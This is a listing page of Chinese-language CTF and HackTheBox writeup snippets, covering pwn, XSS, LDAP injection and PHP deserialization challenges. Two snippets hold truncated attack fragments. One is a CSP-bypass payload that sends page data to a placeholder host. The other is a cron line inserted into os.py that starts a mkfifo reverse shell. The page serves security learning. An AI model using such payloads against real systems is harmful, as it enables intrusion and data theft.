首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏BinarySec

    unexploitable Writeup

    pwnable.kr的writeup在http://weaponx.site/2017/02/28/unexploitable-Writeup-pwnable-kr/ 题目给出了libc,看来是让我们用内存泄漏来计算出 *] Closed connection to chall.pwnable.tw port 10403 0x05 exploit 因为主办方不让公开高分的题目,所以exploit提交到主办方的writeup 系统中了,https://pwnable.tw/writeup/20/927

    1.4K20发布于 2018-09-20
  • 来自专栏ChaMd5安全团队

    QWB WriteUp

    register的析构函数, 调用profile的__call函数,进而调用profile的upload_img函数

    1.5K20发布于 2019-06-02
  • 来自专栏赤道企鹅的博客

    PWN - Writeup

    这题是一个魔改的httpd,Content-Length小于0时存在格式化串漏洞,leak后写one_gadget即可

    34610编辑于 2022-08-01
  • 来自专栏安恒网络空间安全讲武堂

    web writeup

    后来才明白原来题目名就已经是hint了, 进去之后就会发现输入括号和没有括号是有差别的, 然后想起来最近的noxCTF刚刚做过一个LDAP注入

    1.1K30发布于 2019-09-29
  • 来自专栏ChaMd5安全团队

    SCTF WriteUp

    Web math-is-fun1 解题思路 这里有变量覆盖: 可以覆盖全局变量: 使用跳转方式绕过 CSP: location.href=`//xxx.xxx.xxx.xxx/?${documen

    1.4K30发布于 2019-07-08
  • 来自专栏黑伞安全

    FrindZone writeup

    大白又来了,先容我膜拜一波自家师兄S0cke3t的CS插件,大佬牛逼(破音) 这次还是一个当时没有日穿的靶机,不过看官方writeup来说,我们距离拿下靶机只差了一步,还是too 官方的writeup中也给出了另一种方法,将以下代码插入到了os.py中 shell = '''* * * * * root rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/

    66350发布于 2019-10-16
  • 来自专栏安恒网络空间安全讲武堂

    web writeup

    后来才明白原来题目名就已经是hint了, 进去之后就会发现输入括号和没有括号是有差别的, 然后想起来最近的noxCTF刚刚做过一个LDAP注入

    1.1K40发布于 2018-10-25
  • 来自专栏wywwzjj 的技术博客

    Raccoon web Writeup

    "; } 这道题涉及到PHP的代码审计,PHP的伪协议,PHP的序列化,PHP魔术方法,涨了不少姿势, 趁着写 Writeup 把思路再梳理一下。

    46860编辑于 2023-05-09
  • 来自专栏安恒网络空间安全讲武堂

    HackTheBox - Canape Writeup

    原文: https://www.absolomb.com/2018-09-15-HackTheBox-Canape/

    1.6K30发布于 2018-12-11
  • 来自专栏鸿鹄实验室

    vulnhub vedas writeup

    获的flag1:RigVeda: {0e87105d070afcb11c7264cc13f2e86b}

    48510发布于 2021-04-01
  • 来自专栏ChaMd5安全团队

    FireShell CTF WriteUp

    招新小广告 ChaMd5 ctf组 长期招新 尤其是reverse+pwn+合约的大佬 欢迎联系admin@chamd5.org Web Bad Injection 解题思路 任意文件下载: url

    1.6K30发布于 2019-03-07
  • 来自专栏安恒网络空间安全讲武堂

    HackTheBox - Poison Writeup

    来源:https://www.absolomb.com/2018-09-08-HackTheBox-Poison/

    1.5K20发布于 2018-12-18
  • 来自专栏陈冠男的游戏人生

    ROP Emporium writeup

    在 ret2win 这个函数里面有个后门,输出了 flag.txt,地址是:0x8048659,只要把返回地址覆盖成这个就可以了

    80251发布于 2020-03-19
  • 来自专栏赤道企鹅的博客

    Pwn方向writeup

    白给题,触发malloc_consolidate就可以leak+overlapping了

    70820编辑于 2022-08-01
  • 来自专栏KAAAsS's Blog

    Hackergame 2020 Writeup

    且容我用Writeup水一篇blog~ 签到 签到题就是一个前端验证的题目,简单修改前端页面元素就可以。 从零开始的火星文生活 这题和我之前校赛出的题目撞了hhhh(我出的可以参见:SpiritCTF 2020 – Misc Official Writeup 锟斤拷)。同样也是先按照题目使用GBK编码。

    96720编辑于 2022-01-14
  • 来自专栏赤道企鹅的博客

    Pwn 部分writeup

    一个python语言子集的的JIT,可以生成x64汇编代码,题目给出了一个相对于原工程的diff文件,通过比对发现:题目版本删除了部分代码并在末尾通过mmap开辟一个可执行段,将汇编成二进制的机器码放到里面执行并取出返回值。

    63940编辑于 2022-08-01
  • 来自专栏文鹃阁

    Aurora CTF Writeup

    preface 这是深大 Aurora 战队招新题的 writeup ,本菜鸡抱着学习的态度参加比赛,记录下自己的解题思路 web PHP is very good 打开题目,就是一张你的名字 == ,

    62720编辑于 2022-09-01
  • 来自专栏逢魔安全实验室

    ISCC 2018 Writeup

    也希望我们的Writeup能对大家有所帮助吧! 赛事的运维人员还是很nice的 ? WEB 比较数字大小 前端进行了限制,抓包改数字 ? 往期精彩回顾 American Fuzz Lop (AFL) Fuzz 初探 Some Linux Hacking Tricks DDCTF 2018 逆向 baby_mips Writeup

    2.6K40发布于 2018-07-24
  • 来自专栏黑伞安全

    HackTheBox chaos writeup

    wordpress框架、AES加解密、RCE漏洞、缺失环境变量的shell环境、firefox缓存文件信息泄露等,虽然知识点都不是很难,但是靶机一环扣一环,如果思路不对的话很容易就走到死胡同里,还是要先多看看一些writeup

    1K20发布于 2019-10-16
  • 来自专栏LoRexxar's Blog

    pwnhub_WTF_writeup

    writeup 构造xss 构造标签 首先是基本的过滤,单双引号反引号还有尖括号都是直接被过滤的,但是我们在注意到,views.php页面是这样的 <script> title="fda"; content

    52230编辑于 2023-02-21
领券